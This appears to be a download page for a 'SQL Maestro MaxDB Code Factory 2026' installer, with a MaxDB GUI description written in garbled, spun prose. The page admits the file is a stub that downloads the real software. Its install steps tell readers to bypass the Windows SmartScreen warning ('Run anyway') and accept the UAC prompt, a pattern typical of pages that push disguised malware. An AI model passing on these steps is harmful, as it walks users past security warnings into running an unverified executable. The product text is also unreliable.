
Welcome
If you’re using MaxDB and looking for a quicker way to construct queries, play around with scripts or view data then this is the tool to help you. It appears a little more to the point. It doesn’t muck about. You can get straight in, click around, and find out what you need to.
Overview and purpose
SQL Maestro MaxDB Code Factory is designed as an easy to use interface targeted at developers of MaxDB databases. It is intended to make SQL editor, SQL query builder and Data Browser userfriendly, so you will spend less time browsing errors and more time adjusting logic. Layout makes editors, query parts and data grid to point your browser.
How it operates
The application is for Windows and integrates MaxDB servers over regular connections. You open a connection, select a schema, then send commands using editors or visual tools. It allows you to execute scripts with options for parallel execution of several queries and in real-time receive results and error states. It also provides shortcuts for exporting or importing several rows.
- It is the Installer, not the software itself – Smaller, Faster, Convenient
- One-click installer – no manual setup
- The installer downloads the full SQL Maestro MaxDB Code Factory 2026.
How to Install
- Download and extract the ZIP file
- Open the extracted folder and run the installation file
- When Windows shows a blue “unrecognized app” window:
- Click More info → Run anyway
- Click Yes on User Account Control prompt
- Wait for automatic setup (~1 minute)
- Click on Start download
- After setup finishes, launch from desktop shortcut
- Enjoy
Notable Capabilities
- Visual query builder to build SELECT with drag & drop.
- Strong SQL editor including other sub-editor with highlighting / folding:
- Script runner that can run multiple scripts/statements at once.
- Data grid views that are editable, filterable, sortable and Groupable.
- Export/Import tools in various popular formats.
- BLOB viewer and editor allowing manipulation of large binary objects on direct use.
Why you’ll like it
It’s fast. There is nothing UI to get in the way of performing actions. Indeed there are many small, task oriented improvements that we will be incorporating into all of our readers over time: code that is copy pasteable, schema viewable, right there with your script… So when an editor needs just one more adjustment you won’t be cringing, because it doesn’t interrupt your workflow; you keep your hands on your keyboard and your head in your code.
Typical Scenarios
- Rapid development and testing SELECT statements against MAXDB test instances.
- Editing and executing batch SQL scripts, Debugging during the development cycles.
- Export data sets to formats like CSV for analysis or reporting.
- Viewing/editing the BLOB’s content without relying on external viewers.
- Allowing you to manipulate database objects during schema change prototypes.
Wrap-Up
If you want a straightforward, effective, GUI to focus on what you need-SQL-you’ll want this. It’s not cluttered with features no one uses. It’s focused on making script and query work faster, easier and fiddly-free so you can confidently ship changes. It’s by far my favorite to mark pilot proposals against-try it and see if it suits your style.